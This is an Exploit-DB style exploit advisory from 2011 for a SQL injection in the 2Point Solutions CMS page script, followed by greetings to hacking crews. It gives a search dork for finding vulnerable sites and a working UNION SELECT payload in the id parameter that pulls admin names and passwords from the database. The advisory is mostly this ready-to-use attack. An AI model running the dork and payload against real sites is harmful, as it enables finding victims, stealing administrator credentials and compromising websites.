2Point Solutions - 'cmspages.php' SQL Injection

EDB-ID:

17445

CVE:

N/A




Platform:

PHP

Date:

2011-06-23


=============================================
2Point Solutions SQL Injection Vulnerability
=============================================


#################################################################################################

[+] Exploit Title : 2Point Solutions (cmspages.php) SQL Injection Vulnerability

[+] Author : Newbie_Campuz

[+] Published: 2011-06-24 : 02.54 WIB

[+] Test On : Windows XP SP3 

[+] www.jatimcrew.org/

##################################################################################################

# Script Vendor Homepage:
# http://www.2pointsolutions.com/

[+]Dork: "2point solutions"  cmspages.php?id=

[+] SQL Injection


	http://[target]/cmspages.php?id=[SQL]

	
Demo : 	

http://www.site.com/cmspages.php?id=-43+union+select 1,2,group_concat(FName,0x3a,password),4+from+admin--

##################################################################################################
Thanks to Allah SWT n Nabi Muhammad SAW

Special Thanks to : 	
My Parent, My Brother n My Sisters
Byz9991, Doraemon, CrackerManado, Kenthot_cakep, Andalas_oku, Dim_Chaz, Shamus, Chapzha,  phoenixhaxor, mywisdom, 
inc0mpl3te, Pr3tty, newbie_043, KidDevilz, r1pp3rm4ya , XcyberX, flyff666, MISTERFRIBO, Osean, Vhacx,jamsh0ut, 
cybermuttaqin, k3m4ngi, afa, roentah, zh0mbh1e, techno_x46, cyberd0s, Ficarciruas, elfata, bhotar, edo_pranata
Mawar_JatimCrew, -Love Pink, Husna, Chibob_jatimcrew, kucing_raden... and YOU... !!!

All admin, momod, spamguard, staff and members Jatim Crew..
All admin, momod, spamguard, staff and members Xteamweb
All admin, momod, spamguard, staff and members crackermanado
All admin, momod, spamguard, staff and members Pekanbaru Cyber Team..

##################################################################################################